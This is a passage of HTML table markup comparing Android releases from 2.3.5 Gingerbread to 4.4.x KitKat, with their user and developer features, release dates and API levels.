<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Bug fixes<br />
</span>
<span style="font-size: 10pt;">Security enhancements</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2013 Dec 9</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">19</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-4-1" target="_top"><span style="font-size: 10pt;"><strong>Android 4.4.1</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">KitKat</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Bug fixes<br />
</span>
<span style="font-size: 10pt;">Enhance the camera and security feature on Nexus 5</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2013 Dec 5</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">19</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-4-kitkat" target="_top"><span style="font-size: 10pt;"><strong>Android 4.4</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">KitKat</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Screen recording<br />
</span>
<span style="font-size: 10pt;">Enhanced notification access<br />
</span><br />
<span style="font-size: 10pt;">System-wide settings for closed captioning<br />
</span><br />
<span style="font-size: 10pt;">Performance improvements</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Public API for SMS management.<br />
</span>
<span style="font-size: 10pt;">Improved memory usage<br />
</span><br />
<span style="font-size: 10pt;">Security enhancements (SELinux enforcing mode, new cryptographic algorithms, VPN per user…)<br />
</span><br />
<span style="font-size: 10pt;">NFC Host Card Emulation (for wireless payment, loyalty programs…)<br />
</span><br />
<span style="font-size: 10pt;">Printing Framework<br />
</span><br />
<span style="font-size: 10pt;">Storage Access Framework<br />
</span><br />
<span style="font-size: 10pt;">Hardware Sensor Batching<br />
</span><br />
<span style="font-size: 10pt;">GLES2.0 SurfaceFlinger<br />
</span><br />
<span style="font-size: 10pt;">Chromium WebView<br />
</span><br />
<span style="font-size: 10pt;">Audio monitoring<br />
</span><br />
<span style="font-size: 10pt;">Wi-Fi certified Miracast<br />
</span><br />
<span style="font-size: 10pt;">New Bluetooth profile<br />
</span><br />
<span style="font-size: 10pt;">IR Blasters API<br />
</span><br />
<span style="font-size: 10pt;">Wi-Fi Tunneled Direct Link Setup (TDLS) support<br />
</span><br />
<span style="font-size: 10pt;">Tools for analyzing memory use (procstats, on-device memory status, and profiling)</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2013 Oct 31</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">19</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-3" target="_top"><span style="font-size: 10pt;"><strong>Android 4.3</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Jelly Bean</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Dial pad autocomplete<br />
</span>
<span style="font-size: 10pt;">Ability to create restricted profiles for tablets<br />
</span><br />
<span style="font-size: 10pt;">Bluetooth Low Energy (BLE) support<br />
</span><br />
<span style="font-size: 10pt;">Bluetooth Audio/Video Remote Control Profile (AVRCP) 1.3 support<br />
</span><br />
<span style="font-size: 10pt;">Security and performance enhancements</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Logging and analyzing enhancements<br />
</span>
<span style="font-size: 10pt;">Wi-Fi scanning API<br />
</span><br />
<span style="font-size: 10pt;">Improved DRM (digital rights management) API<br />
</span><br />
<span style="font-size: 10pt;">VP8 encoding</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2013 Jul 24</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">18</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-2-2" target="_top"><span style="font-size: 10pt;"><strong>Android 4.2.2</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Jelly Bean</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Allow toggling Wi-Fi and Bluetooth state in Quick Settings using long-press<br />
</span>
<span style="font-size: 10pt;">Shows the percentage and estimated time remaining in the active download notifications<br />
</span><br />
<span style="font-size: 10pt;">Gallery app updated for faster loading with new image transition<br />
</span><br />
<span style="font-size: 10pt;">Performance enhancements and bug fixes (Bluetooth A2DP audio streaming fix)</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Secure USB debugging (allow debugging to authenticated computers only)</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2013 Feb 11</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">17</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-2-1" target="_top"><span style="font-size: 10pt;"><strong>Android 4.2.1</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Jelly Bean</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Fix missing December bug in the People app<br />
</span>
<span style="font-size: 10pt;">Add support for Bluetooth gamepads and joysticks HID devices</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2012 Nov 27</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">17</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-2" target="_top"><span style="font-size: 10pt;"><strong>Android 4.2</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Jelly Bean</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Lock screen widgets<br />
</span>
<span style="font-size: 10pt;">Wireless display with Miracast<br />
</span><br />
<span style="font-size: 10pt;">Multi-user for tablets</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">vsync timing<br />
</span>
<span style="font-size: 10pt;">Triple buffering<br />
</span><br />
<span style="font-size: 10pt;">reduced touch latency<br />
</span><br />
<span style="font-size: 10pt;">CPU input boost<br />
</span><br />
<span style="font-size: 10pt;">External display support – Display Manager<br />
</span><br />
<span style="font-size: 10pt;">Nested fragments</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2012 Nov 13</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">17</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-1-2" target="_top"><span style="font-size: 10pt;"><strong>Android 4.1.2</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Jelly Bean</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Enable Home screen rotation<br />
</span>
<span style="font-size: 10pt;">Fix bugs and enhance performances</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2012 Oct 9</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">16</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-1-1" target="_top"><span style="font-size: 10pt;"><strong>Android 4.1.1</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Jelly Bean</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Fix a bug on screen orientation</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2012 Jul 23</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">16</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-1" target="_top"><span style="font-size: 10pt;"><strong>Android 4.1</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Jelly Bean</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Google Now<br />
</span>
<span style="font-size: 10pt;">Accessibility: gesture mode, enable braille external keyboards.</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">App stack navigation to define a parent activity in manifest for deep navigation<br />
</span>
<span style="font-size: 10pt;">NFC supports large payloads over Bluetooth<br />
</span><br />
<span style="font-size: 10pt;">WIFI/WIFI-Direct service discovery<br />
</span><br />
<span style="font-size: 10pt;">Large, detailed, multi-action notifications<br />
</span><br />
<span style="font-size: 10pt;">Input manager allows you to query input devices</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2012 Jul 9</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">16</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-0-4" target="_top"><span style="font-size: 10pt;"><strong>Android 4.0.4</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Ice Cream Sandwich</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">stability improvements<br />
</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2012 Mar 28</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">15</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-0-3" target="_top"><span style="font-size: 10pt;"><strong>Android 4.0.3</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Ice Cream Sandwich</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">QVGA video resolution API access<br />
</span>
<span style="font-size: 10pt;">Accessibility API refinements for screen readers<br />
</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2011 Dec 16</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">15</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4" target="_top"><span style="font-size: 10pt;"><strong>Android 4.0.1</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Ice Cream Sandwich</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Facial recognition (Face Unlock)<br />
</span>
<span style="font-size: 10pt;">UI use Hardware acceleration<br />
</span><br />
<span style="font-size: 10pt;">Better voice recognition (dictating/Voice typing)<br />
</span><br />
<span style="font-size: 10pt;">Android Beam app to exchange data through NFC</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2011 Oct 19</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">14</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-0" target="_top"><span style="font-size: 10pt;"><strong>Android 4.0</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Ice Cream Sandwich</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">New lock screen actions<br />
</span>
<span style="font-size: 10pt;">Control over network data<br />
</span><br />
<span style="font-size: 10pt;">Email app supports EAS v14<br />
</span><br />
<span style="font-size: 10pt;">WI-FI direct<br />
</span><br />
<span style="font-size: 10pt;">Bluetooth Health Device Profile</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Address Space Layout Randomization<br />
</span>
<span style="font-size: 10pt;">VPN client API<br />
</span><br />
<span style="font-size: 10pt;">Remote Device camera enable/disable<br />
</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2011 Oct 18</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">14</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-3-2-1" target="_top"><span style="font-size: 10pt;"><strong>Android 3.2.1</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Honeycomb</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Android Market updates<br />
</span>
<span style="font-size: 10pt;">Wi-Fi improvements</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2011 Sep 20</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">13</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-3-2" target="_top"><span style="font-size: 10pt;"><strong>Android 3.2</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Honeycomb</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Media sync from SD card</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Extended API for managing screens support<br />
</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2011 Jul 15</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">13</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android3-1" target="_top"><span style="font-size: 10pt;"><strong>Android 3.1</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Honeycomb</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Open Accessory API<br />
</span>
<span style="font-size: 10pt;">USB host API<br />
</span><br />
<span style="font-size: 10pt;">MTP notifications<br />
</span><br />
<span style="font-size: 10pt;">RTP API for audio</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2011 May 10</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">12</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-3-0" target="_top"><span style="font-size: 10pt;"><strong>Android 3.0</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Honeycomb</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Multi core support<br />
</span>
<span style="font-size: 10pt;">Better tablet support<br />
</span><br />
<span style="font-size: 10pt;">“Private browsing.”<br />
</span><br />
<span style="font-size: 10pt;">HTTP Live streaming</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Device administration<br />
</span>
<span style="font-size: 10pt;">RTP streaming API<br />
</span><br />
<span style="font-size: 10pt;">Forced rendering of layers<br />
</span><br />
<span style="font-size: 10pt;">High-performance WIFI lock</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2011 Feb 22</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">11</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-2-3-6" target="_top"><span style="font-size: 10pt;"><strong>Android 2.3.6</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Gingerbread</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Voice search issue fixed</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2011 Sep 2</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">10</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-2-3-5" target="_top"><span style="font-size: 10pt;"><strong>Android 2.3.5</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Gingerbread</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Improved network performance for the Nexus S 4G<br />
</span>
<span style="font-size: 10pt;">Fixed Bluetooth issues on the Samsung Galaxy S<br />
</span><br />
<span style="font-size: 10pt;">Gmail app improvements</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2011 Jul 25</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">10</span></td>
</tr>
<tr>
